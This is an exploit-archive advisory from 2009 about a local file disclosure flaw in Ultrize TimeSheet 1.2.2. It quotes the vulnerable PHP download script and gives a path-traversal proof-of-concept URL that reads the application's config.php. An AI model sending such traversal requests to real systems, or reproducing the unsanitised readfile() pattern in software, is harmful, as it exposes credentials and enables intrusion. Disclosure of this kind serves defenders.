[Exploit]  [Remote]  [Local]  [Web Apps]  [Dos/Poc]  [Shellcode]  [RSS]

# Title : Ultrize TimeSheet 1.2.2 readfile() Local File Disclosure Vulnerability
# Published : 2009-07-30
# Author : GoLd_M
# Previous Title : Scripteen Free Image Hosting Script 2.3 SQL Injection Exploit
# Next Title : justVisual 1.2 (fs_jVroot) Remote File Inclusion Vulnerabilities


Ultrize TimeSheet 1.2.2 readfile() Local File Disclosure Vulnerability
Code page  /actions/downloadFile.php

====
<?php
//** This script performs the actual file download

$fileName = $_REQUEST['fileName']; <--!!
$job_id = $_REQUEST['job_id']; <--!!
$fullFile = $config['upload_dir'].$job_id.'/'.$fileName; <--!!

if (file_exists($fullFile))
{
    header("Content-Type: application/octet-stream");
    header("Content-Length: ".filesize($fullFile));

    header('Content-Disposition: attachment; fileName="'.$fileName.'"');

    readfile($fullFile); <--!!
}
else
{
    header("HTTP/1.0 404 Not Found");
    print "<h1>File not found. </h1>";
    print $fileName;
    print "<hr>Please make sure your file paths are correct: {$config['upload_dir']}/{$job_id}/$fileName}<br />";
}

?>
====

Poc
/actions/downloadFile.php?fileName=../config.php

          .___________..______     ____    ____  ___       _______   
           |           ||   _           /   / /        /  _____|  
           `---|  |----`|  |_)  |       /   / /  ^     |  |  __    
               |  |     |      /      _    _/ /  /_    |  | |_ |   
               |  |     |  |  ----.   |  |  /  _____   |  |__| |   
               |__|     | _| `._____|   |__| /__/     __ ______|   
                                                             
       ___       ______     ___       _______   _______ .___  ___. ____    ____   
      /        /      |   /        |        |   ____||   /   |      /   /   
     /  ^     |  ,----'  /  ^      |  .--.  ||  |__   |    /  |     /   /    
    /  /_    |  |      /  /_     |  |  |  ||   __|  |  |/|  |   _    _/     
   /  _____   |  `----./  _____    |  '--'  ||  |____ |  |  |  |     |  |       
  /__/     __ ______/__/     __ |_______/ |_______||__|  |__|     |__|  

# www.Syue.com [2009-07-30]